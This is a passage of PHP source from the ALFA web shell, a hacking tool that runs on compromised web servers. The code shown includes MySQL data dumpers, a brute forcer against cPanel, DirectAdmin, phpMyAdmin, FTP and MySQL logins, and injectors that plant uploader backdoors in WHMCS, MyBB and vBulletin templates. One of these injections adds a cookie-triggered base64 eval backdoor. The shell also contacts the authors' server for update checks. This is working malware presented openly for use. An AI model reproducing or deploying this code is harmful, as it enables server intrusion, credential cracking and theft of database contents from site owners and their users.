foreach($lg_array as $key=>$val)$login_html .= '';

echo '';

echo '
Protect:
Cgi Api:
Post Encryption:
Show Icons:
login Page:
UserName:
Password:
';

if($_POST['alfa5']=='>>'){

echo __pre();

if(!empty($_POST['alfa3'])){

$protect = $_POST['alfa1'];

$lgpage = $_POST['alfa2'];

$username = $_POST['alfa3'];

$password = md5($_POST['alfa4']);

$icon = $_POST['alfa6'];

$post_encrypt = $_POST['alfa7'];

$cgi_api_val = $_POST['alfa9'];

@chdir($GLOBALS['home_cwd']);

$basename = @basename($_SERVER['PHP_SELF']);

$data = @file_get_contents($basename);

$user_rand = $GLOBALS["DB_NAME"]["user_rand"];

$pass_rand = $GLOBALS["DB_NAME"]["pass_rand"];

$login_page_rand = $GLOBALS["DB_NAME"]["login_page_rand"];

$safemode_rand = $GLOBALS["DB_NAME"]["safemode_rand"];

$show_icons_rand = $GLOBALS["DB_NAME"]["show_icons_rand"];

$post_encryption_rand = $GLOBALS["DB_NAME"]["post_encryption_rand"];

$cgi_api_rand = $GLOBALS["DB_NAME"]["cgi_api_rand"];

$find_user = '/\''.$user_rand.'\'(.*?),/i';

$find_pw = '/\''.$pass_rand.'\'(.*?),/i';

$find_lg = '/\''.$login_page_rand.'\'(.*?),/i';

$find_p = '/\''.$safemode_rand.'\'(.*?),/i';

$icons = '/\''.$show_icons_rand.'\'(.*?),/i';

$postEnc = '/\''.$post_encryption_rand.'\'(.*?),/i';

$cgi_api_reg = '/\''.$cgi_api_rand.'\'(.*?),/i';

if(!empty($username)&&preg_match($find_user,$data,$e)){

$new = '\''.$user_rand.'\' => \''.$username.'\',';

$data = str_replace($e[0],$new,$data);

}

if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){

$new = '\''.$pass_rand.'\' => \''.$password.'\',';

$data = str_replace($e[0],$new,$data);

}

if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){

$new = '\''.$login_page_rand.'\' => \''.$lgpage.'\',';

$data = str_replace($e[0],$new,$data);

}

if(!empty($find_p)&&preg_match($find_p,$data,$e)){

$new = '\''.$safemode_rand.'\' => \''.$protect.'\',';

$data = str_replace($e[0],$new,$data);

}

if(preg_match($icons,$data,$e)){

$new = '\''.$show_icons_rand.'\' => \''.$icon.'\',';

$data = str_replace($e[0],$new,$data);

}

if(preg_match($postEnc,$data,$e)){

$new = '\''.$post_encryption_rand.'\' => '.$post_encrypt.',';

$data = str_replace($e[0],$new,$data);

}

if(preg_match($cgi_api_reg,$data,$e)){

$new = '\''.$cgi_api_rand.'\' => '.$cgi_api_val.',';

$data = str_replace($e[0],$new,$data);

}

if(@file_put_contents($basename,$data)){

echo 'UserName: '.$username.'
											

											
Password: '.$_POST['alfa4'].'';
											

											

											

											
}else{
											

											

											

											
__alert("File has no edit access...!");
											

											

											

											
}
											

											

											

											
}else{
											

											

											

											
__alert("UserName is Empty !");
											

											

											

											
}
											

											

											

											
}
											

											

											

											
}elseif($_POST["alfa8"] == "color"){
											

											

											

											
echo('
											

											


											

												

												

												
 

											

											
| Custom Color |

											

											


											

												

												

												
 
');
											

											

											

											
echo '';
											

											

											

											
$template = '';
											

											

											

											
$x = 1;
											

											

											

											
foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
											

											

											

											
 $multi = "";
											

											

											

											
 if(is_array($value)){
											

											

											

											
 if(isset($value["multi_selector"])){
											

											

											

											
 $multi = __ZW5jb2Rlcg(json_encode($value));
											

											

											

											
 }
											

											

											

											
 }
											

											

											

											
 $value = alfa_getColor($key);
											

											

											

											
 $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));
											

											

											

											
 echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);
											

											

											

											
}
											

											

											

											
echo '';
											

											

											

											

											

											

											

											
echo '
											

											

											

											

											

											

											

											

											

											

											


											

												
													

														Help
														
															

															
{index}

															
 		
														
															

															
{target}:

															
 		
														
															

															
															
 		
														
															

															
															
 		
													

													

														-
														
															

															
*

															
 		
														
															

															
Use Default Color:

															
 		
														
															

															

															
 		
														
															

															
															
 		
													

												
											

											

											


											

												

												
												
 

											

											


											

												

												
												

												
												
 

											

											


											

												

												

												
 
';
											

											

											

											
if($_POST['alfa7']=='export'){
											

											

											

											
 echo __pre();
											

											

											

											
 $colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();
											

											

											

											
 $glob_colors = $GLOBALS["__ALFA_COLOR__"];
											

											

											

											
 $array = array();
											

											

											

											
 foreach($glob_colors as $k => $v){
											

											

											

											
 if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
											

											

											

											
 $v = trim($colors[$k]);
											

											

											

											
 }else{
											

											

											

											
 $v = trim(is_array($v)?$v["key_color"]:$v);
											

											

											

											
 }
											

											

											

											
 $array[$k] = $v;
											

											

											

											
 }
											

											

											

											
 $file = "alfa_color_config_".date('Y-m-d-h_i_s').".conf";
											

											

											

											
 $config = json_encode($array, JSON_PRETTY_PRINT);
											

											

											

											
 if(!@file_put_contents($file, $config)){
											

											

											

											
 echo('
											

											


											

												

												

												
 
Color Config:
											

											

											

											

											

											
											

											


											

												

												

												
 
');
											

											

											

											
 }else{
											

											

											

											
 echo('
											

											


											

												

												


												

													

													

													
 
Download Config
												

												


												

													

													

													
 

												
 
');
											

											

											

											
 }
											

											

											

											
}
											

											

											

											
if($_POST['alfa2']=='>>'){
											

											

											

											
 echo __pre();
											

											

											

											
 $colors = json_decode($_POST["alfa1"],true);
											

											

											

											
 $array = "";
											

											

											

											
 $is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;
											

											

											

											
 $glob_colors = $GLOBALS["__ALFA_COLOR__"];
											

											

											

											
 foreach($glob_colors as $k => $v){
											

											

											

											
 if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
											

											

											

											
 $v = trim($colors[$k]);
											

											

											

											
 }else{
											

											

											

											
 $v = trim(is_array($v)?$v["key_color"]:$v);
											

											

											

											
 }
											

											

											

											
 $array .= '"'.trim($k).'" => "'.$v.'",';
											

											

											

											
 }
											

											

											

											
 @chdir($GLOBALS['home_cwd']);
											

											

											

											
 $basename = @basename($_SERVER['PHP_SELF']);
											

											

											

											
 $data = @file_get_contents($basename);
											

											

											

											
 $color = '/\'color\'(.*?)\),/s';
											

											

											

											
 if(preg_match($color,$data,$e)){
											

											

											

											
 $new = "'color' => array(".$array."),";
											

											

											

											
 $data = str_replace($e[0],$new,$data);
											

											

											

											
 if(@file_put_contents($basename, $data)){
											

											

											

											
 echo("
											

											


											

												

												

												
 

											

											


											
[+] Success...

											

											


											

												

												

												
 
");
											

											

											

											
 }else{
											

											

											

											
 echo("
											

											


											

												

												

												
 

											

											


											
[-] We Not have permission to Edit shell...!

											

											


											

												

												

												
 
");
											

											

											

											
 }
											

											

											

											
 }else{
											

											

											

											
 echo("
											

											


											

												

												

												
 

											

											


											
[-] Error...!

											

											


											

												

												

												
 
");
											

											

											

											
 }
											

											

											

											
}
											

											

											

											
}
											

											

											

											
echo('
');
										

										

										

										
alfafooter();
										

										

										

										
}
										

										

										

										
function alfaaboutus(){
										

										

										

										
alfahead();
										

										

										

										
echo '
										

										
';
											

											

											

											
$news = new AlfaCURL();
											

											

											

											
$about_us = $news->Send("http://solevisible.com/aboutus.php");
											

											

											

											
if(empty($about_us)){
											

											

											

											
$about_us = "



☮ ~ PEACE ~ ☮


Shell Coded By Sole Sad & Invisible (ALFA TEaM)


Contact : solevisible@gmail.com


Telegram Channel: @solevisible


Skype : ehsan.invisible


Skype : sole.sad


Persian Gulf For Ever


Iranian Programmers


############



											

											";

}

echo __pre().$about_us;

echo('
');

alfafooter();

}

function alfacoldumper(){

alfahead();

echo('
');

AlfaNum(8,9,10);

echo "
| Mysql Column Dumper |


".getConfigHtml('all')."
";

$delimiter = (!empty($_POST['alfa1']) ? $_POST['alfa1'] : '::');

$selected_data = json_decode($_POST['alfa2'], true);

$username = ($_POST['alfa3']);

$password = ($_POST['alfa4']);

$dbname = ($_POST['alfa5']);

$dfile = ($_POST['alfa6']);

$host = ($_POST['alfa7']);

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => $host, 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => $username, 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => $password, 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => $dbname, 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Output Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']), 'inputSize' => '50')

);

create_table($table);

echo "
";

$db = false;

if(!empty($dbname)){

    $db = @mysqli_connect($host, $username, $password, $dbname);

}

if(count($selected_data) > 0){

    if($db){

        if(!is_dir($dfile)){

            $dfile = $GLOBALS['cwd'];

        }

        $tbls = "";

        $ext = '.txt';

        if($delimiter == 'json'){

            $ext = '.json';

        }

        foreach ($selected_data as $tbl => $cols) {

            $tables_query = mysqli_query($db, "SELECT ".implode(',', $cols)." FROM $tbl");

            $file_name = $dfile.'/'.$dbname.'.'.$tbl.$ext;

            $fp = fopen($file_name, "w");

            $data = array();

            while($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){

                if($delimiter == "json"){

                    $col_arr = array();

                    foreach ($row as $key => $value) {

                        if(empty($value)){

                            $value = "[empty]";

                        }

                         $col_arr[$key] = $value;

                    }

                    $data[$tbl][] = $col_arr;

                }else{

                    $data = "";

                    foreach ($row as $key => $value) {

                        if(empty($value)){

                            $value = "[empty]";

                        }

                        $data .= $value . $delimiter;

                    }

                    fwrite($fp, $data ."\n");

                }

            }

            if($delimiter == "json"){

                fwrite($fp, json_encode($data));

            }

            fclose($fp);

            $tbls .= "Done ~~~> ".$file_name."
";

        }

        echo __pre();

        echo "".$tbls."";

    }

}

if(!empty($dbname) && count($selected_data) == 0){

//echo __pre();

if($db){

    echo("
[ Select your tables and columns for dumping data ]
");

    echo("
Output Type: 
 Delimiter: 
");

    $data = array();

    $tables_query = mysqli_query($db, "SELECT table_name FROM information_schema.tables WHERE table_schema = database();");

    while($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){

        $data[$row["table_name"]] = array();

        $table_count_q = mysqli_query($db, "SELECT count(*) FROM `".$row['table_name']."`");

        $table_count = mysqli_fetch_row($table_count_q);

        $data[$row["table_name"]]["data_count"] = $table_count[0];

        $columns_query = mysqli_query($db, "SELECT column_name FROM information_schema.columns WHERE table_name = '".$row['table_name']."'");

        while($row2 = mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){

            $data[$row["table_name"]]["cols"][] = $row2["column_name"];

        }

    }

    mysqli_close($db);



    echo '
  • ';

        foreach($data as $tbl => $cols){

            echo '
  • '.$tbl.' ('.$cols["data_count"].')
    • ';

              foreach($cols["cols"] as $col){

                  echo '
    • ' . $col . '
    • ';

              }

              echo '
  • ';

        }

        echo '
';

}else{

echo('mysqli_connect : Error!');

}

}

echo('
');

alfafooter();

}

function alfaDumper(){

alfahead();

echo('
');

AlfaNum(8,9,10);

echo "
| Mysql Database Dumper |


".getConfigHtml('all')."
";

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50')

);

create_table($table);

echo "
";

$username = ($_POST['alfa3']);

$password = ($_POST['alfa4']);

$dbname = ($_POST['alfa5']);

$dfile = ($_POST['alfa6']);

$host = ($_POST['alfa7']);

if(!empty($dbname)){

echo __pre();

$msg = "Check this :  ".$dfile."";

if(@mysqli_connect($host,$username,$password,$dbname)){

if(strlen(alfaEx("mysqldump"))>0){

alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '".addslashes($dfile)."'");

echo($msg);

}else{

__alert("Error...!");

}

}else{

echo('mysqli_connect : Error!');

}

}

echo('
');

alfafooter();

}

function Alfa_DirectAdmin_Cracker($info){

if(!$info['mysql'])

$url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';

else $url = $info['protocol'].$info['target'].'/phpmyadmin';

$curl = curl_init();

curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);

curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');

curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);

curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);

curl_setopt($curl, CURLOPT_HEADER,0);

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_URL,$url);

curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);

if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);

$result = @curl_exec($curl);

$curl_errno = curl_errno($curl);

$curl_error = curl_error($curl);

if ($curl_errno > 0) {echo "Error: $curl_error
";}

elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){

echo 'UserName: '.$info['username'].' PassWord: '.$info['password'].'  Login Success....
';

$info['target'] = $url;

CrackerResualt($info);

}

curl_close($curl);

}

function Alfa_CP_Cracker($info){

$url = $info['protocol'].$info['target'].':'.$info['port'];

$curl = curl_init();

curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);

curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');

curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);

curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);

curl_setopt($curl, CURLOPT_HEADER,0);

curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);

curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));

curl_setopt($curl, CURLOPT_URL, $url);

$result = @curl_exec($curl);

$curl_errno = curl_errno($curl);

$curl_error = curl_error($curl);

if ($curl_errno > 0) {echo "Error: $curl_error
";}

elseif(preg_match('/filemanager/i',$result)){

echo 'UserName: '.$info['username'].' PassWord: '.$info['password'].'  Login Success....
';

$info['target'] = $url;

CrackerResualt($info);

}

curl_close($curl);

}

function Alfa_FTP_Cracker($info){

$url = $info['protocol'].$info['target'];

$curl = curl_init();

curl_setopt($curl, CURLOPT_URL, $url);

curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");

$result = @curl_exec($curl);

$curl_errno = curl_errno($curl);

$curl_error = curl_error($curl);

if ($curl_errno > 0) {echo "Error: $curl_error
";}

elseif(preg_match('/(\d+):(\d+)/i',$result)){

echo 'UserName: '.$info['username'].' PassWord: '.$info['password'].'  Login Success....
';

$info['target'] = $url;

CrackerResualt($info);

}

curl_close($curl);

}

function Alfa_Mysql_Cracker($info){

if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){

CrackerResualt($info);

echo 'UserName: '.$info['username'].' PassWord: '.$info['password'].'  Login Success....
';

}

}

function Alfa_FTPC($info){

if($con=@ftp_connect($info['target'],$info['port'])){

if($con){

$login=@ftp_login($con,$info['username'],$info['password']);

if($login){CrackerResualt($info);}}}

@ftp_close($con);

}

function CrackerResualt($info){

$res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;

$c = @fopen($info['fcrack'],'a+');

@fwrite($c, $res);

@fclose($c);

}

function Alfa_Call_Function_Cracker($method,$info){

switch($method){case 'cp':return Alfa_CP_Cracker($info);break;case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);break;case 'ftp':return Alfa_FTP_Cracker($info);break;case 'mysql':return Alfa_Mysql_Cracker($info);break;case 'mysql':return Alfa_FTPC($info);break;}

}

function alfaCrackers(){

alfahead();

AlfaNum(9,10);

echo '

| Brute Forcer |


Login Page:  Protocol:  Website/ip Address: 

Port: 

Users ListPasswords




  



Save Result Into File 


';

$target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);

$port = $_POST['alfa2'];

$usernames= $_POST['alfa3'];

$passwords = $_POST['alfa4'];

$fcrack = $_POST['alfa5'];

$cracking = $_POST['alfa6'];

$protocol = $_POST['alfa7'];

$loginpanel = $_POST['alfa8'];

$p = $loginpanel == 'phpmyadmin' ? $p = true : false;

if($cracking=='start'){

echo __pre();

$exuser = explode("\n",$usernames);

$expw = explode("\n",$passwords);

foreach($exuser as $user){

foreach($expw as $pw){

$array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);

Alfa_Call_Function_Cracker($loginpanel,$array);

}

}

echo '
Attack Finished...';

}

echo '
';

alfafooter();

}

function output($string){ echo "

Click Here !

";}

function alfaShellInjectors(){

alfahead();

echo '
';

AlfaNum(11);

echo '

| Cms Shell Injector |

| WHMCS | | MyBB | | vBulletin |
';

$selector = '

Shell Inject Method : 
 

';

if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){

AlfaNum();

echo __pre()."

| WHMCS |

".getConfigHtml('whmcs')."
";

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')

);

create_table($table);

echo $selector;

echo "
"; if(isset($_POST['alfa6'])) { $dbu = $_POST['alfa6']; $dbn = $_POST['alfa7']; $dbp = $_POST['alfa8']; $dbh = $_POST['alfa9']; $path = $_POST['alfa10']; $method = $_POST['alfa4']; $index = "{php}".ALFA_UPLOADER.";{/php}"; $newin = str_replace("'","\'",$index); $newindex = "

Dear $newin,

Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.

To reset your password, please visit the url below:
{\$pw_reset_url}

When you visit the link above, your password will be reset, and the new password will be emailed to you.

{\$signature}

{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}"; if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){ if(filter_var($path,FILTER_VALIDATE_URL)){ $conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_connect_error()); $soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'"); $soleGet = mysqli_fetch_assoc($soleSave); $tempSave1 = $soleGet['message']; $tempSave = str_replace("'","\'",$tempSave1); mysqli_query($conn,"UPDATE tblconfiguration SET value = '1' WHERE setting = 'AllowSmartyPhpTags'") or die (mysqli_error($conn)); $inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'"; $result = mysqli_query($conn,$inject) or die (mysqli_error($conn)); $create = "insert into tblclients (email) values('solevisible@fbi.gov')"; $result2 = mysqli_query($conn,$create) or die (mysqli_error($conn)); if(function_exists('curl_version') && $method == 'auto'){ $AlfaSole = new AlfaCURL(true); $saveurl = $AlfaSole->Send($path."/pwreset.php"); $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token); $AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov"); $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'"; $Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn)); __alert("shell injectet..."); $ff= 'http://'.$path."/solevisible.php"; output($ff);}else{ echo " 
Please go to Target => ".$path."/pwreset.php
 And Reset Password With Email => solevisible@fbi.gov
And Go To => ".$path."/solevisible.php

";}}else{__alert('Path is not Valid...');}}}

}if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){

AlfaNum(1,2,3,5);

echo __pre()."

| MyBB |

".getConfigHtml("mybb")."


";

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')

);

create_table($table);

echo $selector;

echo "
";

if(isset($_POST['alfa6'])) {

$dbu = $_POST['alfa6'];

$dbn = $_POST['alfa7'];

$dbp = $_POST['alfa8'];

$dbh = $_POST['alfa9'];

$prefix = $_POST['alfa10'];

$method = $_POST['alfa4'];

$shellCode = "{\${".ALFA_UPLOADER."}}";

$newinshell = str_replace("'","\'",$shellCode);

if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){

$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));

$inject = "select template from {$prefix}templates where  title= 'calendar'";

$result = mysqli_query($conn, $inject) or die (mysqli_error($conn));

$GetTemp = mysqli_fetch_assoc($result);

$saveDate = $GetTemp['template'];

$repsave = str_replace($shellCode,"",$saveDate);

$repsave = str_replace("'","\'",$repsave);

$createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";

$result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));

$geturl = "select value from {$prefix}settings where name= 'bburl'";

$findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));

$rowb = mysqli_fetch_assoc($findurl);

$furl = $rowb['value'];

$realurl = parse_url($furl,PHP_URL_HOST);

$realpath = parse_url($furl,PHP_URL_PATH);

$res = false;

$AlfaCurl = new AlfaCURL();

if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){

if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){

@fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");

@fputs($fsock, "HOST: $realurl\r\n");

@fputs($fsock, "Connection: close\r\n\r\n");

$check = fgets($fsock);

if(preg_match("/200 OK/i",$check)){

$repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";

$clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}

@fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){

$AlfaCurl->Send($realurl.$realpath."/calendar.php");

$res = true;

}

if($res){

$ff = 'http://'.$realurl.$realpath."/solevisible.php";

output($ff);

}else{

$ff = 'http://'.$realurl.$realpath."/calendar.php";

$fff = 'http://'.$realurl.$realpath."/solevisible.php";

echo "
Please Go To Target => ".$ff."
And Go To => ".$fff."

";

}}}}

if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){

AlfaNum(1,2,7,9,10);

echo __pre().'

| vbulletin |

'.getConfigHtml('vb').'
';

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50')

);

create_table($table);

echo $selector;

echo '
';

if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){

$method = $_POST['alfa8'];

$faq_name = "faq";

$faq_file = "/faq.php";

$code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";

$conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_connect_error());

$rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";

$recivedata = @mysqli_query($conn,$rec);

$getd = @mysqli_fetch_assoc($recivedata);

$savetoass = $getd['template'];

if(empty($savetoass)){

    $faq_name = "header";

    $faq_file = "/";

    $rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";

    $recivedata = @mysqli_query($conn,$rec);

    $getd = @mysqli_fetch_assoc($recivedata);

    $savetoass = $getd['template'];

    $code = ALFA_UPLOADER.";";

}

$code = str_replace("'","\'",$code);

$p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='".$faq_name."'";

$ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));

$geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");

$getval = @mysqli_fetch_assoc($geturl);

$saveval = $getval['value'];

if($faq_name == "header"){

    if(substr($saveval, -5, 5) == "/core"){

        $saveval = substr($saveval, 0, -5);

    }

}

$realurl = parse_url($saveval,PHP_URL_HOST);

$realpath = parse_url($saveval,PHP_URL_PATH);

$res = false;

$AlfaCurl = new AlfaCURL();

if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){

if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){

@fputs($fsock, "GET $realpath.$faq_file HTTP/1.1\r\n");

@fputs($fsock, "HOST: $realurl\r\n");

@fputs($fsock, "Connection: close\r\n\r\n");

$check = fgets($fsock);

if(preg_match("/200 OK/i",$check)){

$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn,$savetoass)."' WHERE title ='".$faq_name."'";

$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));

$res = true;

}

@fclose($fsock);

}

}elseif(function_exists('curl_version') && $method == 'auto'){

$AlfaCurl->Send($realurl.$realpath.$faq_file);

$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn,$savetoass)."' WHERE title ='".$faq_name."'";

$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));

$res = true;

}

if($res){

$ff = 'http://'.$realurl.$realpath."/solevisible.php";

output($ff);

}else{

$ff = 'http://'.$realurl.$realpath.$faq_file;

$fff = 'http://'.$realurl.$realpath."/solevisible.php";

echo "
First Open This Link => ".$ff."
Second Open This Link => ".$fff."

";}}}

echo '';

alfafooter();

}

function alfacheckfiletype(){

    $path = $_POST['path'];

    $arg = $_POST['arg'];

    if(@is_file($path.'/'.$arg)){

        echo("file");

    }else{

        echo("dir");

    }

}

function alfacheckupdate(){

    if($GLOBALS["DB_NAME"]["cgi_api"]){

        if(!isset($_COOKIE["alfacgiapi_mode"])&&!isset($_COOKIE["alfacgiapi"])){

            _alfa_cgicmd("whoami","perl",true);

            if(strlen(alfaEx("whoami",false,true))>0){

                __alfa_set_cookie("alfa_canruncmd", "true");

            }

        }

    }

    if(function_exists("curl_version")){

        $update = new AlfaCURL();

        $json = $update->Send("http://solevisible.com/update.json?ver=".__ALFA_VERSION__);

        $json = @json_decode($json,true);

        $data = array();

        if($json){

            if(!isset($_COOKIE['alfa_checkupdate']) && !empty($json["type"])){

                if($json["type"] == "update"){

